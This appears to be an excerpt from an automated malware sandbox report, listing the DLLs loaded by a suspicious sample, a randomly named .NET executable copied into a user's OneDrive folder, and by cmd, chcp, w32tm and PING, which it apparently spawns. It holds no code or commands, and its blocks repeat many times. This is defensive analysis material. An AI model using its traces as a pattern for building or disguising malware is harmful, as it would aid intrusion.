                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: edputil.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: slc.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: sppc.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptbase.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sspicli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ktmw32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: amsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: userenv.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dnsapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winnsi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasapi32.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rasman.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rtutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mswsock.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: winhttp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: uxtheme.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: propsys.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: apphelp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: dlnashext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wpdshext.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: edputil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: urlmon.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: iertutil.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: srvcli.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: netutils.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wintypes.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: appresolver.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: slc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: sppc.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: mscoree.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: version.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: windows.storage.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: wldp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: profapi.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: cryptsp.dll
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeSection loaded: rsaenh.dll
